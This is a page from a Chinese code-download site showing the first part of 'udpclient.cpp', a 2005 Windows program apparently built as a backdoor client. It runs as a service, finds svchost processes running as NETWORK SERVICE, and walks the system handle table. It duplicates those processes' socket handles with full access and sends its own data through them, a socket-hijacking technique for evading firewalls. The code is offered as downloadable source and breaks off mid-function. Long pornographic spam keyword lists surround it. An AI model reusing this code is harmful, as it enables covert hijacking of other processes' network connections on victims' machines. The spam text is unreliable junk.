亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? udpclient.cpp

?? 其中客戶端源代碼做了調整: 1. 枚舉進程使用函數改為:CreateToolhelp32Snapshot()等。 2. 為了獲得system權限
?? CPP
?? 第 1 頁 / 共 2 頁
字號: 
/*++

  Made By ZwelL
  zwell@sohu.com
  2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <string.h>
#include "debuglog.h"
//#include <wtsapi32.h>


#pragma comment(lib, "ws2_32")
//#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

#define SERVICENAME "bindport service"
#define  SVCHOSTMAX  6

typedef LONG    NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;
    UCHAR            ObjectTypeNumber;
    UCHAR            Flags;
    USHORT            Handle;
    PVOID            Object;
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;


typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;


VOID WINAPI MyServiceCtrlHandler (DWORD Opcode) ;

int SendMydata(SOCKET    sock);

SERVICE_STATUS          MyServiceStatus;
SERVICE_STATUS_HANDLE   MyServiceStatusHandle;
char		Logbuffer[512];

BOOL LocateNtdllEntry ( void )
{
    BOOL    ret         = FALSE;
    char    NTDLL_DLL[] = "ntdll.dll";
    HMODULE ntdll_dll   = NULL;


    if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
    {
        printf( "GetModuleHandle() failed");
        return( FALSE );
    }
    if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
    {
        goto LocateNtdllEntry_exit;
    }
    ret = TRUE;

LocateNtdllEntry_exit:

    if ( FALSE == ret )
    {
        printf( "GetProcAddress() failed");
    }
    ntdll_dll = NULL;
    return( ret );
}


/*++
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(DWORD pid, char *szUserName)
{
    // sanity checks and default value
    HANDLE   hp=NULL;   
    HANDLE   hToken;   
    int   isok; 
    char   buf[0x400]; 
    DWORD   dwNumBytesRet;
	
    SID_NAME_USE   snu;
    TCHAR          szUser[_MAX_PATH];
    DWORD          chUser = _MAX_PATH;
    PDWORD         pcchUser = &chUser; 
    TCHAR          szDomain[_MAX_PATH];
    DWORD          chDomain = _MAX_PATH;
    PDWORD         pcchDomain = &chDomain;
  
    strcpy(szUserName, "?");
	hp=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,   0,   pid);//0x400   is   PROCESS_QUERY_INFORMATION   
	if (hp==NULL)
	{
		sprintf(Logbuffer,"[i]OpenProcess  error  error: %d\n",GetLastError());
		logprintf(Logbuffer);
		return false;
	}
	isok=OpenProcessToken(hp,   TOKEN_QUERY,   &hToken);
	if(isok)   
 	 { 	/*
 	 	sprintf(Logbuffer,"succeed  OpenProcessToken   pid :%d\n",pid);
		logprintf(Logbuffer);
		*/
  		isok=GetTokenInformation(hToken,   TokenUser,   &buf,  sizeof(buf),   &dwNumBytesRet);   
  		if(isok)   
  		{     
  			if (LookupAccountSid(
				NULL,   
				(DWORD   *)(*(DWORD   *)buf),
				szUser, 
        		pcchUser, 
       			 szDomain, 
       			 pcchDomain, 
       			 &snu)   
			)
			{
				wsprintf(szUserName, "%s", szUser);
			}
  			CloseHandle(hToken);   
  		}   
  	}   
	else
	{
		sprintf(Logbuffer,"[^]OpenProcessToken  error  :%d\n",GetLastError());
		logprintf(Logbuffer);
	}
	/*
	sprintf(Logbuffer,"GetUserNameFromSid  returned  szUserName:%s\n ",szUserName);
	logprintf(Logbuffer);
	*/
	CloseHandle(hp);  
    return true;
}  


/*++

This routine is used to get the DNS process's Id
  
Here, I use WTSEnumerateProcesses to get process user Sid, 
and then get the process user name. Beacause as it's a "NETWORK SERVICE", 
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId(int  *pid,  int maxcount)
{
    //PWTS_PROCESS_INFO pProcessInfo = NULL;
    DWORD             ProcessCount = 0;
    char              szUserName[255];
    DWORD              Id = -1;
	int   index=0;

	PROCESSENTRY32 processEntry = { 0 };
    MODULEENTRY32 me32 = { 0 }; 
	
	HANDLE hProcessSnap = 
		CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == INVALID_HANDLE_VALUE) return  Id;
	
	processEntry.dwSize = sizeof(PROCESSENTRY32); 
    me32.dwSize = sizeof(MODULEENTRY32); 
	BOOL bRet=Process32First(hProcessSnap, &processEntry);
	while(bRet)
	{
	
	 if (stricmp(processEntry.szExeFile,"svchost.exe")==0)
	 {
	 	sprintf(Logbuffer,"ProcessID: %d (%s)\n", 
	          processEntry.th32ProcessID,processEntry.szExeFile);
		logprintf(Logbuffer);
		
	 	 GetUserNameFromSid(processEntry.th32ProcessID, szUserName);
		 if( stricmp(szUserName, "NETWORK SERVICE") == 0)
               {
               	if (index<maxcount)
               	{
				pid[index] = processEntry.th32ProcessID;
                    	index++;
               	}
               }
              
	 }

		bRet=Process32Next(hProcessSnap, &processEntry);   
	}

	CloseHandle(hProcessSnap);
	
    	sprintf(Logbuffer,"GetDNSProcessId  return  id:  %d \n ",index);
	logprintf(Logbuffer);
    return index;
}


/*++
This doesn't work as we know, sign...
but you can use the routine for other useing...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
    HANDLE hProcess = NULL, 
            hAccessToken = NULL;
    TCHAR InfoBuffer[1000], szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
    if(hProcess == NULL)
    {
        printf("OpenProcess wrong");
        CloseHandle(hProcess);
        return false;
    }

    if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
    {
        printf("OpenProcessToken wrong:%08x", GetLastError());
        return false;
    }

    GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);

    if(hProcess)
        CloseHandle(hProcess);
    if(hAccessToken)
        CloseHandle(hAccessToken);
    return true;
}*/


/*++
Now, it is the most important stuff... ^_^
--*/
SOCKET GetSocketFromId (DWORD PID)
{
    NTSTATUS                     status;
    PVOID                        buf   = NULL;
    ULONG                        size  = 1;
    ULONG                        NumOfHandle = 0;
    ULONG                        i;
    PSYSTEM_HANDLE_TABLE_ENTRY_INFO    h_info  = NULL;
    HANDLE    sock = NULL;
    DWORD    n;
	int res;

	sprintf(Logbuffer,"begin to  GetSocket  from pid :%d\n",PID);
	logprintf(Logbuffer);
    buf=malloc(0x1000);
    if(buf == NULL)
    {
        sprintf(Logbuffer,"GetSocketFromId  malloc wrong\n");
	logprintf(Logbuffer);
        return NULL;
    }
    status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
    if(STATUS_INFO_LENGTH_MISMATCH == status)
    {
        free(buf);
        buf=malloc(n);
        if(buf == NULL)
        {
            sprintf(Logbuffer,"GetSocketFromId  malloc wrong\n");
		logprintf(Logbuffer);
            return NULL;
        }
        status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
    }
    else
    {
        sprintf(Logbuffer,"ZwQuerySystemInformation wrong\n");
	logprintf(Logbuffer);
        return NULL;
    }
	if (status!=0)
	{
		sprintf(Logbuffer,"ZwQuerySystemInformation wrong\n");
		logprintf(Logbuffer);
       	 return NULL;
	}

    NumOfHandle = *(ULONG*)buf;
	/*
	sprintf(Logbuffer,"GetSocketFromId   numofhandle  %d\n",NumOfHandle);
	logprintf(Logbuffer);
	*/
    h_info = ( PSYSTEM_HANDLE_TABLE_ENTRY_INFO )((ULONG)buf+sizeof(ULONG));

    for(i = 0; i<NumOfHandle ;i++)
    {
        try
        {	/*
        	n=i%1000;
		if (n==0)
		{
			logprintf("(i = 0; i<NumOfHandle ;i++)  n=i%1000   n==0\n");
		}
		*/
            if( ( h_info[i].UniqueProcessId== PID )  && ( h_info[i].ObjectTypeIndex== 0x1c ) 
                && (h_info[i].HandleValue!=0x6c)    // I don't know why if the Handle equal to 0x6c, in my test, it stops at getsockname()
                                            // So I jump over this situation... 
                                            // May be it's different in your system, 
                ) //wind2000 is 0x1a
            {
                //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);
		 if( 0 == DuplicateHandle(
                    OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID), 
                    (HANDLE)h_info[i].HandleValue, 
                    GetCurrentProcess(), 
                    &sock, 
                    STANDARD_RIGHTS_REQUIRED, 
                    true, 
                    DUPLICATE_SAME_ACCESS)
                    )
                {
                    sprintf(Logbuffer,"DuplicateHandle wrong:%d", GetLastError());
			logprintf(Logbuffer);
                    continue;
                }

		 sprintf(Logbuffer,"begin to  getsockname,handlevalue:0x%x.\n", h_info[i].HandleValue);
		 logprintf(Logbuffer);
                //printf("DuplicateHandle ok\n");
                sockaddr_in name = {0};
                name.sin_family = AF_INET;
                int namelen = sizeof(sockaddr_in);
                res=getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );
                if (res)
                {	/*
                	sprintf(Logbuffer,"getsockname  error  %d\n", WSAGetLastError());
			logprintf(Logbuffer);
			*/
                }
		  else
		  {
		  	logprintf("getsockname   succeed.\n");
		  }
                if(ntohs(name.sin_port)>0)    // if port > 0, then we  test  to  send  data.
                {
                    //break;
                    res=SendMydata((SOCKET)sock);
			if (res>0)break;			//sendmydata  succeed,  we  can use  this  sock!!
                }
		
            }
        }
        catch(...)
        {
            continue;
        }
	 sock=NULL;
    }

    if ( buf != NULL )
    {
        free( buf );
    }
    return (SOCKET)sock;
}


/*++
This is not required...
--*/
BOOL EnablePrivilege (BOOL   bEnable)
{
      BOOL             bResult   =  false;   
  	HANDLE             hToken;   
  	TOKEN_PRIVILEGES     TokenPrivileges;   
    
 	 if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))   
 	 {   
  		printf("EnablePrivilege--OpenProcessToken   Error:   %d\n",GetLastError());   
  		return bResult;  
  	}   
  	TokenPrivileges.PrivilegeCount =   1;   
  	TokenPrivileges.Privileges[0].Attributes   =   bEnable   ?   SE_PRIVILEGE_ENABLED   :   0;   
  	LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&TokenPrivileges.Privileges[0].Luid);   
  	if (AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
  	{	/*
  		if (GetLastError()==ERROR_SUCCESS)
  		{
  			bResult=true;

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲www啪成人一区二区麻豆| 欧美精品一区二区三区蜜桃视频| 亚洲视频免费在线观看| 国产成人精品三级麻豆| 国产欧美精品一区二区三区四区| 国产不卡在线播放| 中文字幕在线免费不卡| 欧美午夜一区二区三区| 亚洲v日本v欧美v久久精品| 日韩一区二区精品葵司在线| 精品无码三级在线观看视频| 国产网站一区二区| 91一区二区在线| 亚洲影院理伦片| 日韩一级免费观看| 国产精品 日产精品 欧美精品| 国产欧美日韩麻豆91| 色综合久久久网| 奇米色一区二区| 欧美国产日韩a欧美在线观看| a在线欧美一区| 五月天一区二区| 久久九九影视网| 欧美影院一区二区三区| 久久99精品久久久久久国产越南| 中文字幕电影一区| 欧美日韩精品免费观看视频| 美女看a上一区| 亚洲区小说区图片区qvod| 欧美顶级少妇做爰| 成人一级视频在线观看| 亚州成人在线电影| 欧美极品xxx| 91精品国产福利在线观看| 国产99久久久国产精品| 午夜精品久久久久久久| 欧美国产日韩精品免费观看| 欧美美女激情18p| 成人动漫视频在线| 蜜臀av在线播放一区二区三区| 国产婷婷色一区二区三区四区| 欧美羞羞免费网站| 国产suv精品一区二区6| 亚洲v中文字幕| 成人欧美一区二区三区视频网页 | 精品一区二区三区免费观看| 中日韩免费视频中文字幕| 正在播放亚洲一区| 色婷婷精品大视频在线蜜桃视频| 国产一区二区三区美女| 亚洲成在人线在线播放| 亚洲视频一二区| 国产欧美一区二区精品忘忧草| 欧美精品一卡二卡| 91国产免费观看| 99久久精品国产网站| 国产自产2019最新不卡| 日日夜夜免费精品| 夜夜精品浪潮av一区二区三区| 欧美国产一区二区在线观看| 精品国产电影一区二区| 欧美电影在线免费观看| 一本色道久久综合狠狠躁的推荐| 国产成人午夜视频| 精品一区二区影视| 日本不卡不码高清免费观看| 亚洲综合小说图片| 最新日韩av在线| 中文字幕日韩精品一区| 国产日韩成人精品| 国产欧美日韩三区| 国产调教视频一区| 国产欧美日韩亚州综合 | 精品久久久三级丝袜| 欧美片网站yy| 欧美日韩精品电影| 欧美日韩黄色影视| 91麻豆精品国产91久久久久| 精品婷婷伊人一区三区三| 欧美午夜精品一区二区三区| 91在线观看美女| 色一情一乱一乱一91av| 91色.com| 在线观看91精品国产入口| 日本道精品一区二区三区 | 视频一区欧美精品| 日本v片在线高清不卡在线观看| 视频一区国产视频| 久久99精品国产91久久来源| 韩国欧美国产一区| 国产69精品久久99不卡| 成人av资源站| 在线精品亚洲一区二区不卡| 欧美亚洲免费在线一区| 3d成人h动漫网站入口| 91精品国产日韩91久久久久久| 欧美一区二区视频在线观看2022| 日韩亚洲欧美综合| 国产香蕉久久精品综合网| 亚洲欧洲日韩综合一区二区| 亚洲黄网站在线观看| 日韩av电影免费观看高清完整版| 美女免费视频一区| 成人精品在线视频观看| 色综合久久六月婷婷中文字幕| 欧美日韩你懂得| 亚洲精品一区二区在线观看| 国产精品视频第一区| 亚洲综合色区另类av| 美腿丝袜亚洲三区| 成a人片亚洲日本久久| 欧美日韩亚洲综合| 久久久精品国产免大香伊| 亚洲人成网站在线| 看电视剧不卡顿的网站| 波多野结衣的一区二区三区| 欧美日韩一卡二卡三卡| 久久精品亚洲麻豆av一区二区| 亚洲少妇最新在线视频| 蓝色福利精品导航| 91亚洲精品久久久蜜桃| 日韩欧美精品在线| 亚洲免费电影在线| 精品无人码麻豆乱码1区2区 | 青青草国产精品亚洲专区无| 成人在线综合网| 91精品国产手机| 亚洲天堂免费在线观看视频| 免费看日韩精品| 欧美怡红院视频| 日本一二三不卡| 日本怡春院一区二区| 成人黄色一级视频| 欧美一级午夜免费电影| 中文字幕欧美一区| 国产乱码精品一区二区三区忘忧草 | 欧美激情在线一区二区| 亚洲一线二线三线视频| 成人免费毛片app| 精品国产一区二区三区久久影院| 玉足女爽爽91| 国产99久久精品| 精品裸体舞一区二区三区| 亚洲国产乱码最新视频| 不卡av免费在线观看| 久久久噜噜噜久噜久久综合| 日韩黄色小视频| 欧美系列亚洲系列| 国产精品日产欧美久久久久| 蜜桃一区二区三区在线| 欧美丰满少妇xxxbbb| 亚洲精品久久久蜜桃| av网站一区二区三区| 久久精品免视看| 激情伊人五月天久久综合| 欧美一区二区三区电影| 午夜精品在线看| 欧美日韩一区二区在线视频| 亚洲美女电影在线| 欧美一区二区日韩| 欧美日韩亚洲国产综合| 亚洲美女屁股眼交| 色域天天综合网| 国产精品对白交换视频| www.一区二区| 国产欧美日韩不卡| 国产成人av电影| 国产欧美精品区一区二区三区| 国产一区 二区 三区一级| 久久天天做天天爱综合色| 久久国产欧美日韩精品| 日韩精品一区二区三区老鸭窝| 日韩av电影免费观看高清完整版 | 极品美女销魂一区二区三区免费| 91精品久久久久久蜜臀| 日韩高清不卡一区| 日韩欧美自拍偷拍| 国内精品免费**视频| 国产日韩欧美在线一区| 国产一区二区精品久久| 中文av一区特黄| 色94色欧美sute亚洲线路二| 亚洲午夜免费视频| 欧美猛男gaygay网站| 日韩1区2区3区| 精品久久99ma| 国产成人精品三级麻豆| 亚洲欧美中日韩| 在线视频国内自拍亚洲视频| 亚洲成av人片在线| 精品捆绑美女sm三区| 成人少妇影院yyyy| 亚洲激情av在线| 欧美一区二区三区在| 国产精品综合二区| 亚洲欧洲综合另类在线| 欧美一区二区三区在| 国产成人av影院| 亚洲精品国产第一综合99久久| 6080亚洲精品一区二区|